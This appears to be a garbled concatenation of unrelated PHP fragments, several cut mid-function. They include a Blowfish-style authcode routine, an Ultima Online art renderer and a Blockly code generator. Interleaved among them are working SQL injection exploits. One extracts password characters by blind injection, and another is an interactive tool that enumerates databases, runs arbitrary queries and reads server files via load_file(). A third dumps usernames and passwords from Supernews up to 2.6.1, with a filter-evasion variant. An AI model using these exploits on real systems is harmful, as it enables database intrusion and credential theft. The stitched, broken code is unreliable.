function encCode($content)
{
$i = '';
$c = '';
$c = '';
for ($i = 1; $i <= len($content); $i++) {
$c = $c . '%' . hex(asc(mid($content, $i, 1)));
}
$encCode = $c;
return @$encCode;
}
function check_chr($hostname, $path, $pos, $char, $username)
{
$char = ord($char);
if (!($sp = fsockopen($hostname, 80, $errno, $errstr, 5))) {
die("[-] Unknow hostname.");
}
$query = hex("1' OR ASCII(SUBSTRING((SELECT password FROM morcego_users WHERE username='******'),{$pos},1))={$char}-- ");
$request = "GET {$path}fichero.php?{$query} HTTP/1.1\r\n" . "Host: {$hostname}\r\n" . "Connection: Close\r\n\r\n";
fputs($sp, $request);
while (!feof($sp)) {
$reply .= fgets($sp, 1024);
}
fclose($sp);
if (preg_match("|Page not found|", $reply)) {
return false;
} else {
return true;
}
}
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n";
if ($argc != 2) {
echo "Usage: \n";
echo "php {$argv['0']} <target url>\n";
echo "Example:\n";
echo "php {$argv['0']} http://www.website.com/blog\n";
exit;
}
$target = $argv[1];
if (substr($target, strlen($target) - 1) != "/") {
$target .= "/";
}
$inject = $target . "index.php?id=" . urlencode("-0' ");
echo "[*] Trying to get informations...\n";
$token = uniqid();
$token_hex = hex($token);
// http://localhost/cms/theblog/theblog2-0/index.php?id=-62%27%20UNION%20ALL%20SELECT%201,2,3,4,5,concat%28login,0x3c3d3e,senha,0x3c3d3e,nivel%29,7,8,9,10,11,12,13%20from%20theblog_users%20LIMIT%200,1--+
$infos = file_get_contents($inject . urlencode("union all select 1,2,3,4,5,concat({$token_hex},user(),{$token_hex},version(),{$token_hex}),7,8,9,10,11,12,13-- "));
$infos_r = array();
preg_match_all("/{$token}(.*){$token}(.*){$token}/", $infos, $infos_r);
$user = $infos_r[1][0];
$version = $infos_r[2][0];
if ($user) {
echo "[!] MySQL version: {$version}\n";
echo "[!] MySQL user: {$user}\n";
} else {
echo "[-] Error while getting informations.\n";
}
echo "[*] Getting users...\n";
$i = 0;
while (true) {
function urlToAsc($url)
{
$i = '';
for ($i = 1; $i <= len($url); $i++) {
$urlToAsc = $urlToAsc . '%' . hex(ascW(mid($url, $i, 1)));
}
return @$urlToAsc;
}
function main($msg = null)
{
global $token, $token_hex;
echo "\n" . $msg . "\n";
puts("[>] MAIN MENU");
puts("[1] Browse MySQL");
puts("[2] Run SQL Query");
puts("[3] Read file");
puts("[4] About");
puts("[0] Exit");
$resp = gets();
if ($resp == "0") {
exit;
} elseif ($resp == "1") {
// pega dbs
$i = 0;
puts("[.] Getting databases:");
while (true) {
$pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT {$i},1");
if ($pega) {
puts(" - " . $pega);
} else {
break;
}
$i++;
}
puts("[!] Current database: " . runquery("SELECT database()"));
puts("[?] Enter database name for select:");
$own = array();
$own['db'] = gets();
$own['dbh'] = hex($own['db']);
// pega tables da db
$i = 0;
puts("[.] Getting tables from {$own['db']}:");
while (true) {
$pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema={$own['dbh']} LIMIT {$i},1");
if ($pega) {
puts(" - " . $pega);
} else {
break;
}
$i++;
}
puts("[?] Enter table name for select:");
$own['tb'] = gets();
$own['tbh'] = hex($own['tb']);
// pega colunas da table
$i = 0;
puts("[.] Getting columns from {$own['db']}.{$own['tb']}:");
while (true) {
$pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema={$own['dbh']} AND table_name={$own['tbh']} LIMIT {$i},1");
if ($pega) {
puts(" - " . $pega);
} else {
break;
}
$i++;
}
puts("[?] Enter columns name, separated by commas (\",\") for select:");
$own['cl'] = explode(",", gets());
// pega dados das colunas
foreach ($own['cl'] as $coluna) {
$i = 0;
puts("[=] Column: {$coluna}");
while (true) {
$pega = runquery("SELECT {$coluna} FROM {$own['db']}.{$own['tb']} LIMIT {$i},1");
if ($pega) {
puts(" - {$pega}");
$i++;
} else {
break;
}
}
echo "\n[ ] -+-\n";
}
main();
} elseif ($resp == "2") {
puts("[~] RUN SQL QUERY");
puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
puts("[?] Query (enter for exit): ");
$query = gets();
if (!$query) {
main();
} else {
main(runquery($query . "\n"));
}
} elseif ($resp == "3") {
puts("[?] File path (may not have priv):");
$file = hex(gets());
$le = runquery("SELECT load_file({$file}) AS wc");
if ($le) {
main($le);
} else {
main("File not found, empty or no priv!");
}
} elseif ($resp == "4") {
puts("Coded by WhiteCollarGroup");
puts("www.wcgroup.host56.com");
puts("*****@*****.**");
puts("twitter.com/WCollarGroup");
puts("facebook.com/WCollarGroup");
puts("wcollargroup.blogspot.com");
main();
} else {
main("[!] Wrong choice.");
}
}
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0)
{
// 动态密钥长度,相同的明文产生不同的密钥依靠动态密钥(初始化向量IV)
// 随机密钥长度 取值0~32
// $ckey_length = 4;
$ckey_length = 0;
// 密钥
$key = md5($key ? $key : UC_KEY);
// 密钥a参与加/解密
$keya = md5(substr($key, 0, 16));
// 密钥b用来做数据完整性的验证
$keyb = md5(substr($key, 16, 16));
// 密钥c用于变化生成的密文(初始向量IV)
$keyc = $ckey_length ? $operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length) : '';
// 参与运算的密钥
$cryptkey = $keya . md5($keya . $keyc);
$key_length = strlen($cryptkey);
// 明文,前10位用来保存时间戳,解密时验证有效性
// 10到26位用来保存$keyb
// 解密时通过密钥$keyb验证数据完整性
// 解码从$ckey_length开始,前为动态密钥
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
//返回的是0-255的随机排列的数组
$rndkey = array();
// 产生密钥簿,用来产生密钥
for ($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
// 用固定算法,打乱密钥簿,增加随机性。
// 好像很复杂,实际并没有增加密文强度
for ($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
$xx = '';
// 真实地密钥
// 核心加密/解密部分
for ($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$i];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$xx .= chr(($box[$a] + $box[$j]) % 256);
// 从密钥簿获取密钥进行异或,再转成字符
$result .= chr(ord($string[$i]) ^ $box[($box[$a] + $box[$j]) % 256]);
}
echo "xor key is " . hex($xx) . "\n";
if ($operation == 'DECODE') {
// 验证数据的有效性
if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
// 把动态密钥保存在密文里,使每次加密产生的密文不同
// 加密密文有特殊字符,用base64编码
return $keyc . str_replace('=', '', base64_encode($result));
}
}
if ($n == 12) {
return "CC";
} else {
if ($n == 13) {
return "DD";
} else {
if ($n == 14) {
return "EE";
} else {
return "FF";
}
}
}
}
}
}
}
}
function hex($r, $g, $b)
{
return hex_of($r) . hex_of($g) . hex_of($b);
}
echo "<html><table>\n";
for ($i = 0; $i < 16; $i++) {
for ($j = 0; $j < 16; $j++) {
for ($k = 0; $k < 16; $k++) {
echo " <tr><td>" . hex($i, $j, $k) . "</td><td width=16px bgcolor=" . hex($i, $j, $k) . "></tr>\n";
}
}
}
echo "\n</table></html>\n";
<?php
require dirname(__FILE__) . '/../lib/HashCryptMd5.php';
require dirname(__FILE__) . '/../lib/HashCryptSha1.php';
for ($i = 0; $i < 20; $i++) {
$string .= "It works!:) ";
}
$passwordEncoding = '1234567890';
$passwordDecoding = '1234567890';
$cryptClass = 'HashCryptMd5';
p($string);
//encoding
$stringOFB = $cryptClass::lib()->encodeOFB($string, $passwordEncoding);
$stringCFB = $cryptClass::lib()->encodeCFB($string, $passwordEncoding);
hex($stringOFB);
hex($stringCFB);
//decoding
$stringOFB = $cryptClass::lib()->decodeOFB($stringOFB, $passwordDecoding);
$stringCFB = $cryptClass::lib()->decodeCFB($stringCFB, $passwordDecoding);
p($stringOFB);
p($stringCFB);
function p($s)
{
echo "<p>" . $s . "</p>";
}
function hex($s)
{
p(bin2hex($s));
}
function name($q)
{
global $names;
foreach ($names as $hex => $name) {
if ($q == $name) {
return hex($hex);
}
}
foreach ($names as $hex => $name) {
$search = "/^{$q}/i";
if (preg_match($search, $name)) {
return hex($hex);
}
}
return false;
}
$request = strip_tags(file_get_contents($url . urlencode("union all select 1,2,3,4,concat(" . hex($token) . ",user," . hex($token) . ",pass," . hex($token) . "),6,7 from supernews_login limit {$i},1-- ")));
preg_match_all("/{$token}(.*){$token}(.*){$token}/", $request, $get);
if ($get[1][0] != "") {
$user = $get[1][0];
$pass = $get[2][0];
echo "\nUser: {$user}\nPass: {$pass}\n";
$i++;
} else {
echo "\nGood luck! :-D";
break;
}
}
} elseif ($version == 2) {
$i = 0;
while (true) {
$request = strip_tags(file_get_contents($url . urlencode("uniunionon seleselectct 1,2,3,4,5,concat(" . hex($token) . ",user," . hex($token) . ",pass," . hex($token) . "),7,8 from supernews_login limit {$i},1-- ")));
preg_match_all("/{$token}(.*){$token}(.*){$token}/", $request, $get);
if ($get[1][0] != "") {
$user = $get[1][0];
$pass = $get[2][0];
echo "\nUser: {$user}\nPass: {$pass}\n";
$i++;
} else {
echo "\nGood luck! :-D";
break;
}
}
} else {
echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
function createart($id, $hue, $show)
{
if (file_exists("images/art/art_" . $id . "_" . $hue . ".png")) {
if ($show == 1) {
Header("Content-type: image/png");
Header("Content-disposition: inline; filename=art_" . $id . "_" . $hue . ".png");
$img = imagecreatefrompng("images/art/art_" . $id . "_" . $hue . ".png");
$black = imagecolorallocate($img, 0, 0, 0);
imagecolortransparent($img, $black);
imagepng($img);
return;
}
//return;
}
$oldhue = $hue;
$mulpath = "./uofiles/";
$hue = hex($hue);
$id = hex($id);
$id += 0x4000;
$hues = FALSE;
$tiledata = FALSE;
$gumpindex = FALSE;
$gumpfile = FALSE;
//open files for reading
//**********************
if ($hue < 1 || $hue > 65535) {
//If invalid or missing hue, unset hue and don't read hues.mul and tiledata.mul
$hue = 0;
} else {
//If valid hue, read hues.mul and tiledata.mul
$hues = fopen("{$mulpath}hues.mul", "rb");
if ($hues == FALSE) {
$hue = 0;
}
$tiledata = fopen("{$mulpath}tiledata.mul", "rb");
if ($tiledata == FALSE) {
$hue = 0;
} else {
$index = $id - 0x4000;
$group = intval($index / 32);
$groupidx = $index % 32;
fseek($tiledata, 512 * 836 + 1188 * $group + 4 + $groupidx * 37, SEEK_SET);
$tileflag = read_byte($tiledata, 4);
if ($tileflag & 0x40000) {
$partialhue = 1;
} else {
$partialhue = 0;
}
fclose($tiledata);
}
}
//Read artidx.mul
$gumpindex = fopen("{$mulpath}artidx.mul", "rb");
if ($gumpindex == FALSE) {
unavailable_pic();
exit;
} else {
fseek($gumpindex, $id * 12, SEEK_SET);
$lookup = read_byte($gumpindex, 4);
$size = read_byte($gumpindex, 4);
fclose($gumpindex);
}
//Read art.mul
$gumpfile = fopen("{$mulpath}art.mul", "rb");
if ($gumpfile == FALSE) {
unavailable_pic();
exit;
} else {
fseek($gumpfile, $lookup, SEEK_SET);
$flag = read_byte($gumpfile, 4);
$width = read_byte($gumpfile, 2);
$height = read_byte($gumpfile, 2);
//create base image
//**********************
$im = imagecreatetruecolor($width, $height);
$almostblack = imagecolorallocate($im, 0, 0, 0);
imagefill($im, 0, 0, $almostblack);
$black = imagecolorallocate($im, 0, 0, 0);
imagecolortransparent($im, $black);
imagealphablending($im, true);
imageSaveAlpha($im, true);
//Read pixels
//**********************
for ($i = 0; $i < $height; $i++) {
$offset[$i] = read_byte($gumpfile, 2);
}
$datastart = ftell($gumpfile);
$x = 0;
$y = 0;
//Display without hues
//**********************
if ($hue <= 0) {
while ($y < $height) {
$xOffset = read_byte($gumpfile, 2);
$xRun = read_byte($gumpfile, 2);
if ($xRun + $xOffset > 2048) {
break;
} else {
if ($xRun + $xOffset != 0) {
$x += $xOffset;
for ($Run = 0; $Run < $xRun; $Run++) {
$color[$Run] = read_byte($gumpfile, 2);
$r = ($color[$Run] >> 10) * 8;
$g = ($color[$Run] >> 5 & 0x1f) * 8;
$b = ($color[$Run] & 0x1f) * 8;
if (imagecolorexact($im, $r, $g, $b) == -1) {
$col = imageColorAllocate($im, $r, $g, $b);
imagesetpixel($im, $x, $y, $col);
} else {
$found = imagecolorexact($im, $r, $g, $b);
imagesetpixel($im, $x, $y, $found);
}
$x++;
}
} else {
$x = 0;
$y++;
if (isset($offset[$y])) {
fseek($gumpfile, $offset[$y] * 2 + $datastart, SEEK_SET);
}
}
}
}
} else {
$hue = $hue - 1;
$orighue = $hue;
if ($hue > 0x8000) {
$hue = $hue - 0x8000;
}
if ($hue > 3001) {
$hue = 1;
}
$colors = intval($hue / 8) * 4;
$colors = 4 + $hue * 88 + $colors;
fseek($hues, $colors, SEEK_SET);
for ($i = 0; $i < 32; $i++) {
$color32[$i] = read_byte($hues, 2);
$color32[$i] |= 0x8000;
}
while ($y < $height) {
$xOffset = read_byte($gumpfile, 2);
$xRun = read_byte($gumpfile, 2);
if ($xRun + $xOffset > 2048) {
break;
} else {
if ($xRun + $xOffset != 0) {
$x += $xOffset;
for ($Run = 0; $Run < $xRun; $Run++) {
$color[$Run] = read_byte($gumpfile, 2);
$r = $color[$Run] >> 10;
$g = $color[$Run] >> 5 & 0x1f;
$b = $color[$Run] & 0x1f;
if ($partialhue == 1 && ($r == $g && $r == $b)) {
$newr = ($color32[$r] >> 10) * 8;
$newg = ($color32[$r] >> 5 & 0x1f) * 8;
$newb = ($color32[$r] & 0x1f) * 8;
} else {
if ($partialhue == 1) {
$newr = $r * 8;
$newg = $g * 8;
$newb = $b * 8;
} else {
$newr = ($color32[$r] >> 10) * 8;
$newg = ($color32[$r] >> 5 & 0x1f) * 8;
$newb = ($color32[$r] & 0x1f) * 8;
}
}
if (imagecolorexact($im, $newr, $newg, $newb) == -1) {
$col = imageColorAllocate($im, $newr, $newg, $newb);
imagesetpixel($im, $x, $y, $col);
} else {
$found = imagecolorexact($im, $newr, $newg, $newb);
imagesetpixel($im, $x, $y, $found);
}
$x++;
}
} else {
$x = 0;
$y++;
if (isset($offset[$y])) {
fseek($gumpfile, $offset[$y] * 2 + $datastart, SEEK_SET);
}
}
}
}
fclose($hues);
}
}
fclose($gumpfile);
$index = $id - 0x4000;
if (hexdec($oldhue) > 0) {
$hue = $hue + 1;
}
imagepng($im, "images/art/art_" . $index . "_" . $hue . ".png", 0, NULL);
imagedestroy($im);
if ($show == 1) {
Header("Content-type: image/png");
Header("Content-disposition: inline; filename=art_" . $id . "_" . $hue . ".png");
$img = imagecreatefrompng("images/art/art_" . $index . "_" . $hue . ".png");
$black = imagecolorallocate($img, 0, 0, 0);
imagecolortransparent($img, $black);
imagepng($img);
imagedestroy($img);
}
return;
}
function blockToCode($block)
{
if ($block == NULL) {
return '';
}
if ($block->nodeName != 'block') {
echo "xml Wrong";
echo $block->nodeName;
return '';
}
$type = $block->getAttribute('type');
switch ($type) {
case 'controls_if':
return controls_if($block);
break;
case 'logic_boolean':
return logic_bool($block);
break;
case 'logic_compare':
return logic_compare($block);
break;
case 'logic_operation':
return logic_operation($block);
break;
case 'logic_negate':
return logic_negate($block);
break;
case 'logic_ternary':
return logic_ternary($block);
break;
case 'logic_null':
return logic_null($block);
break;
case 'controls_whileUntil':
return controls_whileUntil($block);
break;
case 'controls_flow_statements':
return controls_flow_statements($block);
break;
case 'io_buzzer':
return buzzer_msec($block);
break;
case 'text':
return textvalue($block);
break;
case 'text_print':
return prints($block);
break;
case 'math_number':
return math_number($block);
break;
case 'motion':
return motion($block);
break;
case 'turn':
return turn($block);
break;
case 'soft_turn':
return soft_turn($block);
break;
case 'back_turn':
return back_turn($block);
break;
case 'position_motion':
return position_motion($block);
break;
case 'position_turn':
return position_turn($block);
break;
case 'position_turn_soft':
return position_turn_soft($block);
break;
case 'position_turn_back':
return position_turn_back($block);
break;
case 'sensor_white':
return sensor_white($block);
break;
case 'sensor_sharp':
return sensor_sharp($block);
break;
case 'sensor_ir':
return sensor_ir($block);
break;
case 'buzzer_on':
return buzzer_on($block);
break;
case 'buzzer_off':
return buzzer_off($block);
break;
case 'delay_ms':
return delay_ms($block);
break;
case 'math_arithmetic':
return math_arithmetic($block);
break;
case 'math_single':
return math_single($block);
break;
case 'math_trig':
return math_trig($block);
break;
case 'math_modulo':
return math_modulo($block);
break;
case 'register':
return register($block);
break;
case 'pin':
return pin($block);
break;
case 'set_item':
return set_item($block);
break;
case 'call_function':
return call_function($block);
break;
case 'call_function_with_return':
return call_function_with_return($block);
break;
case 'function_defreturn':
return function_defreturn($block);
break;
case 'function_defnoreturn':
return function_defnoreturn($block);
break;
case 'procedures_callnoreturn':
return procedures_callnoreturn($block);
break;
case 'procedures_callreturn':
return procedures_callreturn($block);
break;
case 'hex':
return hex($block);
break;
case 'return':
return returnr($block);
break;
case 'variable_get':
return variable_get($block);
break;
case 'incl_ude':
return incl_ude($block);
break;
case 'define':
return def_ine($block);
break;
default:
echo "not defined in blockToCode " . $block->getAttribute('type');
}
}